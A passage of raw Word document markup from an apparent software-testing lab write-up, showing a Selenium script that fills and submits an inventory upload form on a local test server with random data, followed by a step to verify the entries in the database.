              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>range(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">10):     page = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>driver.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>("http://127.0.0.1:8000/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>upload_item</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDE3B45" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2494C020" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239"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(By.NAME, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>itemname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">")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799B616A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="238"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(By.NAME, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>itemname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>randstring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>random.choice</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(digits)))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r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>driver.find_element</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(By.NAME, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F51EE2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="236" w:lineRule="auto"/>
              <w:ind w:left="1440" w:right="2903"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>manufacturingdate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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4EAEBC36" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="207743FA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>manufacturingdate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7797ED" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">'2022-09-09') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790C2B39" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"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(By.NAME, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>expirydate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">")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62E31886" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239"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(By.NAME, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>expirydate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">('2023-09-09') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D30BF65" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"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"description")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122B630E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"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"description")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>randstring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">(45)) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2583D000" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCF6784" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"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"quantity")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4BC312C9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239"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"quantity")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">('12') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B48F13" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE18E83" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239"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"price")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4A2523C9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"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"price")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">('250') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDABAF4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B42C975" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"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"discount")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.clear</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C37446D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> =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 xml:space="preserve">(By.NAME, "discount")     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inputElement.send_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">('15') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F48E8E9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1BE7EB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>driver.find</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>_element</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>By.CSS_SELECTOR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>, '.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>inventoryadd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089D01D5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="76"/>
              <w:ind w:left="1440"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>.bigcard</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">2 input[type="submit"]').click() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5C0B98" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="49"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">39 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08357713" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74D70975" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify if the required false data is added to the database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7892B4FA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F35D52E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-121"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780E9D47" wp14:editId="63B4B443">
                <wp:extent cx="5948782" cy="3095473"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="45450" name="Group 45450"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5948782" cy="3095473"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5948782" cy="3095473"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6165" name="Rectangle 6165"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="739420" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2B3C1D31" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Output:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6166" name="Rectangle 6166"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="554685" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="668E008F"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167" name="Rectangle 6167"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="3404010" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6CCE7234" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Random data inserted in the database</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6168" name="Rectangle 6168"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2560650" y="202692"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="69A65DA4" w14:textId="77777777" w:rsidR="00F97B52"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6169" name="Rectangle 6169"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5906720" y="2946273"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="340DE04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197" name="Picture 6197"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId128"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="19253" y="371048"/>
                            <a:ext cx="5873750" cy="2675255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6198" name="Shape 6198"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="14491" y="366348"/>
                            <a:ext cx="5883275" cy="2684780"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5883275" h="2684780">
                                <a:moveTo>
                                  <a:pt x="0" y="2684780"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5883275" y="2684780"/>
                                </a:lnTo>
                                <a:lnTo>
